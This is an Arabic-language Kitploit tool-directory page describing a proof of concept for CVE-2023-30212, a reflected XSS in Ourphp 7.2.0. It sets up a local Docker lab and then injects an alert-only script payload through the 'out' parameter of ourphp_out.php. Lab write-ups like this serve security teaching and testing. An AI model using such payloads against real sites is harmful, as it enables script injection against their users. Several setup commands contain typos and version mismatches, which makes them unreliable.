Skip to content
KitploitKITPLOIT
أدواتالمدونة
إرسال
أدواتالمدونة
إرسال

أدوات الاختراق واختبار الاختراق والأمن السيبراني لترسانتك الأمنية!

Kitploit هو دليل لأدوات الاختراق والأمن السيبراني واختبار الاختراق. اكتشف آخر تحديثات المشاريع للعثور على الثغرات وتحليل الأنظمة وأتمتة الاختبارات وتعزيز أمنك.

··الخلاصات·اتصال·الخصوصية·© 2026 Kitploit

دليل الأدوات

الفئات

عرض جميع الفئات
Loading categories
CVE-2023-30212-POC — استغلال إثبات المفهوم لـ CVE-2023-30212، وهي ثغرة XSS في Ourphp 7.2.0، بما في ذلك إعداد Docker وعرض الحمولة. | Kitploit
أدوات/GitHubGitHub/arunsnap/cve-2023-30212-poc
تحليل الثغرات الأمنيةالاستغلالاستغلال تطبيقات الويباختبار الاختراقالتعلم والتعليممختبرات وتدريب عملي
GitHubarunsnap/cve-2023-30212-poc

CVE-2023-30212-POC

استغلال إثبات المفهوم لـ CVE-2023-30212، وهي ثغرة XSS في Ourphp 7.2.0، بما في ذلك إعداد Docker وعرض الحمولة.

عرض المستودع
11منذ 3 سنواتلم تتم المراجعة بعد

الأكثر شعبية

عرض الكل →

اكتشف الأدوات الأكثر استخدامًا من قبل مجتمعنا.

استكشف جميع الأدوات

تصفح مجموعتنا من الأدوات

عرض جميع الأدوات →
مشاركة

CVE-2023-30212-POC

إنشاء بيئة دوكر قابلة للاستغلال واستغلال الثغرة في Ourphp الإصدار 7.2.0 (CVE 2023 30212)

الخطوة 1. قم بتنزيل وتثبيت دوكر في نظامك. أنا أستخدم دوكر لأنه سريع وسهل لتثبيت أوبونتو

الخطوة 2. إعداد بيئة دوكر

root@kitploit:~
sudo apt-get install docker.io
docker pull ubuntu
docker run -d -t --name test-container -p 80:80 -p 443:44
3 -p 3306:3306 -p 21:21 ubuntu
docker exec -it test-container bash

الخطوة 3. تثبيت التبعيات

root@kitploit:~
apt-get update
apt-get install wget
apt-get install nano
apt-get install unzip
apt-get install net-tools
apt-get install locate

الخطوة 4. تثبيت خادم الويب، php و mysql. سأقوم بتثبيت خادم xampp لهذا الغرض.

root@kitploit:~
wget https://liquidtelecom.dl.sourceforge.net/project/xampp/XAMPP%20Linux/7.2.0/xampp-linux-x64-7.2.0-0-installer.run
chmod +x xampp-linux-x64-7.2.0-0-installer.run
./xampp-linux-x64-7.2.0-0-installer.run
cd /opt/lampp
./xmapp start

الخطوة 5. تنزيل Ourphp الإصدار 7.2.0

root@kitploit:~
wget https://zdown.chinaz.com/202305/ourphp-zyb-v7.5.0.20230515.zip
cp ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs
unzip ourphp-zyb-v7.5.0.20230515.zip /opt/lampp/htdocs/
chmod -R 777

الخطوة 6. إعداد Ourphp على المتصفح. افتح متصفحك وأدخل localhost أو 127.0.0.1. اتبع التعليمات وقم بتثبيت Ourphp

الخطوة 7. استغلال الثغرة. إصدار Ourphp 7.2.0 يحتوي على ثغرة XSS (Cross-Site Scripting). للتخفيف من الثغرة في ملف /client/manage/ourphp_out.php الذي يسمح بتنفيذ كود XSS

تسجيل الدخول اكتشاف الثغرة

root@kitploit:~
    تحتاج إلى تعديل الكود. تنشأ الثغرة عندما يتم تعيين المعامل "ourphp_admin" على "logout"، والمتغير القابل للتحكم هو "out"

النتيجة النهائية

إثبات المفهوم

root@kitploit:~
 payload - "</script><script>alert('xss')</script>".
root@kitploit:~
parameter - http://localhost/client/manage/ourphp_out.php?ourphp_admin=logout&out=</script><script>alert('xss')</script>

فيديو

فيديو
(https://www.youtube.com/watch?v=l9lHyjY9_X0)

تنزيل الأداة